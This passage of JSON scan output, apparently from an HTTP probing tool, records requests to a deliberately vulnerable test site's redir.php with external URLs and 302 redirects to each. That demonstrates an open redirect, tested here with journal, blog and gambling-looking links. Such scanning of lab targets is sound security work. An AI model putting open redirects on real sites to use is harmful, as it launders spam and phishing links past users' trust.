tml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://joinsers.blogspot.com/\",\"time\":\"351.365537ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.550639477Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jokerwarior.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jokerwarior.com/\",\"location\":\"http://jokerwarior.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jokerwarior.com/\",\"time\":\"348.202575ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.661788857Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journal.ussh.vnu.edu.vn/files/journals/2/articles/1264/submission/original/1264-1449-2-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journal.ussh.vnu.edu.vn/files/journals/2/articles/1264/submission/original/1264-1449-2-SM.html\",\"location\":\"http://journal.ussh.vnu.edu.vn/files/journals/2/articles/1264/submission/original/1264-1449-2-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journal.ussh.vnu.edu.vn/files/journals/2/articles/1264/submission/original/1264-1449-2-SM.html\",\"time\":\"356.134467ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:26.831121856Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journal.ussh.vnu.edu.vn/files/journals/2/articles/2169/submission/original/2169-2376-2-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journal.ussh.vnu.edu.vn/files/journals/2/articles/2169/submission/original/2169-2376-2-SM.html\",\"location\":\"http://journal.ussh.vnu.edu.vn/files/journals/2/articles/2169/submission/original/2169-2376-2-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journal.ussh.vnu.edu.vn/files/journals/2/articles/2169/submission/original/2169-2376-2-SM.html\",\"time\":\"347.189775ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:27.027904949Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4048/submission/original/4048-8090-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4048/submission/original/4048-8090-1-SM.html\",\"location\":\"http://journals.hnpu.edu.ua/files/journals/12/articles/4048/submission/original/4048-8090-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4048/submission/original/4048-8090-1-SM.html\",\"time\":\"340.861277ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:27.07868485Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4050/submission/original/4050-8093-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4050/submission/original/4050-8093-1-SM.html\",\"location\":\"http://journals.hnpu.edu.ua/files/journals/12/articles/4050/submission/original/4050-8093-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4050/submission/original/4050-8093-1-SM.html\",\"time\":\"350.671328ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:27.128444636Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4052/submission/original/4052-8096-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4052/submission/original/4052-8096-1-SM.html\",\"location\":\"http://journals.hnpu.edu.ua/files/journals/12/articles/4052/submission/original/4052-8096-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4052/submission/original/4052-8096-1-SM.html\",\"time\":\"339.750689ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:27.51926409Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4054/submission/original/4054-8099-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4054/submission/original/4054-8099-1-SM.html\",\"location\":\"http://journals.hnpu.edu.ua/files/journals/12/articles/4054/submission/original/4054-8099-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4054/submission/original/4054-8099-1-SM.html\",\"time\":\"351.744105ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:27.93137728Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4057/submission/original/4057-8103-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4057/submission/original/4057-8103-1-SM.html\",\"location\":\"http://journals.hnpu.edu.ua/files/journals/12/articles/4057/submission/original/4057-8103-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4057/submission/original/4057-8103-1-SM.html\",\"time\":\"347.309486ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:27.959447465Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4059/submission/original/4059-8106-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4059/submission/original/4059-8106-1-SM.html\",\"location\":\"http://journals.hnpu.edu.ua/files/journals/12/articles/4059/submission/original/4059-8106-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4059/submission/original/4059-8106-1-SM.html\",\"time\":\"343.029396ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:28.131444018Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4061/submission/original/4061-8109-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4061/submission/original/4061-8109-1-SM.html\",\"location\":\"http://journals.hnpu.edu.ua/files/journals/12/articles/4061/submission/original/4061-8109-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.hnpu.edu.ua/files/journals/12/articles/4061/submission/original/4061-8109-1-SM.html\",\"time\":\"351.070217ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:28.678940361Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16143/submission/original/16143-38327-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16143/submission/original/16143-38327-1-SM.html\",\"location\":\"http://journals.nubip.edu.ua/files/journals/19/articles/16143/submission/original/16143-38327-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16143/submission/original/16143-38327-1-SM.html\",\"time\":\"347.343999ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:28.723979681Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16147/submission/original/16147-38331-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16147/submission/original/16147-38331-1-SM.html\",\"location\":\"http://journals.nubip.edu.ua/files/journals/19/articles/16147/submission/original/16147-38331-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16147/submission/original/16147-38331-1-SM.html\",\"time\":\"350.536024ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:30.432223211Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16149/submission/original/16149-38333-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16149/submission/original/16149-38333-1-SM.html\",\"location\":\"http://journals.nubip.edu.ua/files/journals/19/articles/16149/submission/original/16149-38333-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16149/submission/original/16149-38333-1-SM.html\",\"time\":\"360.849788ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:31.708951808Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16151/submission/original/16151-38335-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16151/submission/original/16151-38335-1-SM.html\",\"location\":\"http://journals.nubip.edu.ua/files/journals/19/articles/16151/submission/original/16151-38335-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16151/submission/original/16151-38335-1-SM.html\",\"time\":\"356.218229ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:31.763992082Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16153/submission/original/16153-38337-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16153/submission/original/16153-38337-1-SM.html\",\"location\":\"http://journals.nubip.edu.ua/files/journals/19/articles/16153/submission/original/16153-38337-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://journals.nubip.edu.ua/files/journals/19/articles/16153/submission/original/16153-38337-1-SM.html\",\"time\":\"347.104009ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:32.095652705Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jrre.ue.edu.pk/files/journals/1/articles/522/submission/522-1-1625-1-2-20221114.ht\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jrre.ue.edu.pk/files/journals/1/articles/522/submission/522-1-1625-1-2-20221114.ht\",\"location\":\"http://jrre.ue.edu.pk/files/journals/1/articles/522/submission/522-1-1625-1-2-20221114.ht\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jrre.ue.edu.pk/files/journals/1/articles/522/submission/522-1-1625-1-2-20221114.ht\",\"time\":\"356.758575ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:32.925919208Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jrre.ue.edu.pk/files/journals/1/articles/522/submission/522-1-1625-1-2-20221114.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jrre.ue.edu.pk/files/journals/1/articles/522/submission/522-1-1625-1-2-20221114.html\",\"location\":\"http://jrre.ue.edu.pk/files/journals/1/articles/522/submission/522-1-1625-1-2-20221114.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jrre.ue.edu.pk/files/journals/1/articles/522/submission/522-1-1625-1-2-20221114.html\",\"time\":\"347.089664ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:32.943190847Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/323/submission/323-13-860-1-2-20220704.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/323/submission/323-13-860-1-2-20220704.html\",\"location\":\"http://jst.ntt.edu.vn/files/journals/2/articles/323/submission/323-13-860-1-2-20220704.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/323/submission/323-13-860-1-2-20220704.html\",\"time\":\"343.181062ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.00468572Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/327/submission/327-13-864-1-2-20220705.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/327/submission/327-13-864-1-2-20220705.html\",\"location\":\"http://jst.ntt.edu.vn/files/journals/2/articles/327/submission/327-13-864-1-2-20220705.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/327/submission/327-13-864-1-2-20220705.html\",\"time\":\"339.039573ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.010731785Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/325/submission/325-13-862-1-2-20220705.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/325/submission/325-13-862-1-2-20220705.html\",\"location\":\"http://jst.ntt.edu.vn/files/journals/2/articles/325/submission/325-13-862-1-2-20220705.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/325/submission/325-13-862-1-2-20220705.html\",\"time\":\"356.094383ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.317119343Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/329/submission/329-13-866-1-2-20220705.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/329/submission/329-13-866-1-2-20220705.html\",\"location\":\"http://jst.ntt.edu.vn/files/journals/2/articles/329/submission/329-13-866-1-2-20220705.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/329/submission/329-13-866-1-2-20220705.html\",\"time\":\"346.492934ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.390823897Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/331/submission/331-13-868-1-2-20220705.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/331/submission/331-13-868-1-2-20220705.html\",\"location\":\"http://jst.ntt.edu.vn/files/journals/2/articles/331/submission/331-13-868-1-2-20220705.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/331/submission/331-13-868-1-2-20220705.html\",\"time\":\"355.669043ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.397279113Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/333/submission/333-13-870-1-2-20220705.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/333/submission/333-13-870-1-2-20220705.html\",\"location\":\"http://jst.ntt.edu.vn/files/journals/2/articles/333/submission/333-13-870-1-2-20220705.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/333/submission/333-13-870-1-2-20220705.html\",\"time\":\"344.248948ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.467806238Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/335/submission/335-13-872-1-2-20220705.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/335/submission/335-13-872-1-2-20220705.html\",\"location\":\"http://jst.ntt.edu.vn/files/journals/2/articles/335/submission/335-13-872-1-2-20220705.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/335/submission/335-13-872-1-2-20220705.html\",\"time\":\"344.134213ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.500307588Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/399/submission/399-13-952-2-2-20220809.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/399/submission/399-13-952-2-2-20220809.html\",\"location\":\"http://jst.ntt.edu.vn/files/journals/2/articles/399/submission/399-13-952-2-2-20220809.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jst.ntt.edu.vn/files/journals/2/articles/399/submission/399-13-952-2-2-20220809.html\",\"time\":\"351.325439ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.599243442Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://judipilihan.vip/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://judipilihan.vip/\",\"location\":\"http://judipilihan.vip/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://judipilihan.vip/\",\"time\":\"353.79719ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.639170924Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow123.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow123.blogspot.com/\",\"location\":\"http://justplangrow123.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://justplangrow123.blogspot.com/\",\"time\":\"350.878763ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.702296789Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow1234.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow1234.blogspot.com/\",\"location\":\"http://justplangrow1234.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://justplangrow1234.blogspot.com/\",\"time\":\"348.308282ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.761708117Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow1234.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow1234.blogspot.com/management.html\",\"location\":\"http://justplangrow1234.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://justplangrow1234.blogspot.com/management.html\",\"time\":\"346.062363ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.841605505Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow234.blogspot.com/\",\"input\":\"htt